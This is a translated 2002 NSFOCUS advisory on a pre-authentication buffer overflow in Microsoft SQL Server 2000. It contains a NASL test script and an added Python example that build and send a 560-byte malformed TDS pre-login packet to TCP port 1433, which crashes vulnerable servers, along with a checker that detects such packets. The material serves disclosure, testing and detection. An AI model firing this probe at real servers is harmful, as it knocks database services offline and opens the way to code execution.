NSFOCUS Security Monthly (绿盟安全月刊), Issue 34: Latest Vulnerabilities
Microsoft SQL Server Pre-Authentication Remote Buffer Overflow Vulnerability

Date: 2002-08-16

Published: 2002-08-06
Updated: 2002-08-07

Affected systems:
Microsoft SQL Server 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000
Microsoft SQL Server 2000 SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000
Microsoft SQL Server 2000 SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000
Description:
----------------------------------------------------------------------
BUGTRAQ  ID: 5411

Microsoft SQL Server is a large-scale database system developed by Microsoft.

Microsoft SQL Server has a vulnerability in its pre-authentication processing that a remote attacker can use to mount a buffer overflow attack.

The pre-authentication (pre-login) handling in Microsoft SQL Server is flawed: a remote attacker who connects to TCP port 1433 can trigger a buffer overflow with a malformed pre-login packet. Because the flaw is reached before any authentication takes place, no credentials are required, and a successful attack may let the attacker execute arbitrary code on the system with the privileges of the SQL Server process.

It has not yet been confirmed exactly which SQL Server versions are affected.

<*Source: Dave Aitel (daitel@atstake.com)
  
  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
         http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
*>

Test method:
----------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users act at their own risk!

Dave Aitel (daitel@atstake.com) provided the following NASL test script:

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!

if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);

script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
# TDS PRELOGIN packet, taken from mssql.spk: an 8-byte TDS header
# (type 0x12 = PRELOGIN, status 0x01 = end of message, length 0x0034 = 52
# bytes), the option table (VERSION, ENCRYPTION, INSTOPT, THREADID, each as
# token/offset/length, then the 0xff terminator), the 6-byte VERSION value
# and the 1-byte ENCRYPTION value. The 12-byte INSTOPT value that the table
# advertises at offset 0x1c ("MSSQLServer" plus NUL) is what comes next,
# and that is the field the attack string is dropped into.
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

# taken from mssql.spk: the NUL that terminates the instance name,
# followed by the 4-byte THREADID value
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # uncomment this to see what normally happens
        #attack_string = "MSSQLServer";
        # uncomment next line to actually test for overflow:
        # 560 filler bytes in place of the 11-byte instance name, while
        # the TDS header still claims a 52-byte packet
        attack_string = crap(560);
        # assemble the probe: fixed header, oversized instance name, fixed tail
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        # a healthy server answers the PRELOGIN; a crashed one sends nothing
        r = recv(socket:soc, length:4096);
        close(soc);
        display("Result:", r, "\n");
        if(!r)
        {
            display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}
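The pre-login packet the NASL script sends, rebuilt and taken apart in Python, as an added example for this page (it is not the advisory's or Dave Aitel's code). build_prelogin() assembles a well-formed TDS PRELOGIN from its parts and reproduces the script's 52-byte "MSSQLServer" packet byte for byte; build_hello_probe() reproduces the 560-byte probe; check_prelogin() applies the two checks a length-validating server or a TCP/1433 IDS rule would make, and so flags what separates the probe from a normal pre-login: the header length disagrees with the bytes on the wire, and the instance name runs hundreds of bytes past its advertised 12-byte slot before a NUL. The byte strings are copied from the script above; the 128-byte instance-name threshold and every function name are this example's own assumptions.

```python
"""TDS PRELOGIN builder/inspector for the MS SQL "Hello" overflow probe.

Added example for this page; not Dave Aitel's code and not part of the NASL
script above. Byte layout follows the public MS-TDS PRELOGIN format; the
128-byte instance-name threshold is a heuristic chosen here.
"""
import struct

TDS_PRELOGIN = 0x12      # TDS packet type PRELOGIN
TDS_STATUS_EOM = 0x01    # status bit: end of message
OPT_VERSION, OPT_ENCRYPTION, OPT_INSTOPT, OPT_THREADID = 0x00, 0x01, 0x02, 0x03
OPT_TERMINATOR = 0xFF
MAX_SANE_INSTANCE = 128  # heuristic bound (assumption); real instance names are far shorter

# Bytes copied from the NASL script on this page (pkt_hdr / pkt_tail).
NASL_PKT_HDR = bytes([
    0x12, 0x01, 0x00, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x06, 0x01, 0x00, 0x1b,
    0x00, 0x01, 0x02, 0x00, 0x1c, 0x00, 0x0c, 0x03, 0x00, 0x28, 0x00, 0x04, 0xff, 0x08, 0x00, 0x02,
    0x10, 0x00, 0x00, 0x00,
])
NASL_PKT_TAIL = bytes([0x00, 0x24, 0x01, 0x00, 0x00])


def build_prelogin(instance, version=b"\x08\x00\x02\x10\x00\x00",
                   encryption=b"\x00", thread_id=b"\x24\x01\x00\x00"):
    """Build a well-formed PRELOGIN whose header length matches the body.

    Body = option table of (token, offset, length) big-endian entries plus a
    0xFF terminator, then each value at the offset the table advertises.
    INSTOPT carries the NUL-terminated instance name.
    """
    options = [(OPT_VERSION, version), (OPT_ENCRYPTION, encryption),
               (OPT_INSTOPT, instance + b"\x00"), (OPT_THREADID, thread_id)]
    offset = 5 * len(options) + 1        # values start right after the table
    table, data = b"", b""
    for token, value in options:
        table += struct.pack(">BHH", token, offset, len(value))
        data += value
        offset += len(value)
    body = table + bytes([OPT_TERMINATOR]) + data
    # header: type, status, total length (incl. header), SPID, packet id, window
    header = struct.pack(">BBHHBB", TDS_PRELOGIN, TDS_STATUS_EOM, 8 + len(body), 0, 0, 0)
    return header + body


def build_hello_probe(length=560):
    """Reproduce the NASL probe: fixed header, `length` bytes of 'X' (the
    default fill of NASL crap()), fixed tail. The header still says 0x34."""
    return NASL_PKT_HDR + b"X" * length + NASL_PKT_TAIL


def parse_prelogin(packet):
    """Parse the TDS header and option table; values are read as advertised."""
    ptype, status, declared_len, _spid, _pid, _win = struct.unpack(">BBHHBB", packet[:8])
    body = packet[8:]
    table, options, pos = {}, {}, 0
    while pos + 5 <= len(body) and body[pos] != OPT_TERMINATOR:
        token, off, ln = struct.unpack(">BHH", body[pos:pos + 5])
        table[token] = (off, ln)
        options[token] = body[off:off + ln]
        pos += 5
    return {"type": ptype, "status": status, "declared_len": declared_len,
            "wire_len": len(packet), "table": table, "options": options}


def check_prelogin(packet):
    """Return anomaly strings for a captured PRELOGIN (empty list = looks sane).

    Two things the probe gets wrong on purpose, which a server-side length
    check or an IDS rule on TCP/1433 can key on: the declared length disagrees
    with the bytes on the wire, and the instance name runs far past its table
    entry before hitting a NUL.
    """
    p = parse_prelogin(packet)
    findings = []
    if p["type"] != TDS_PRELOGIN:
        return ["not a PRELOGIN packet (type 0x%02x)" % p["type"]]
    if p["declared_len"] != p["wire_len"]:
        findings.append("header declares %d bytes but %d arrived"
                        % (p["declared_len"], p["wire_len"]))
    if OPT_INSTOPT in p["table"]:
        off, ln = p["table"][OPT_INSTOPT]
        body = packet[8:]
        end = body.find(b"\x00", off)
        name_len = (len(body) if end < 0 else end) - off
        if name_len > MAX_SANE_INSTANCE:
            findings.append("INSTOPT name runs %d bytes before NUL (table says %d)"
                            % (name_len, ln))
    return findings


if __name__ == "__main__":
    benign = build_prelogin(b"MSSQLServer")
    assert benign == NASL_PKT_HDR + b"MSSQLServer" + NASL_PKT_TAIL
    print("benign:", len(benign), "bytes", check_prelogin(benign))
    print("probe :", len(build_hello_probe()), "bytes", check_prelogin(build_hello_probe()))
```

Running the file shows the benign packet passing clean and the probe producing two findings. The parser deliberately trusts the option table the way a naive server would, which is why check_prelogin() re-scans the INSTOPT field for its NUL instead of trusting the 12-byte length the table claims.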

Recommendations:
----------------------------------------------------------------------
Vendor patch:

Microsoft
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.microsoft.com/technet/security/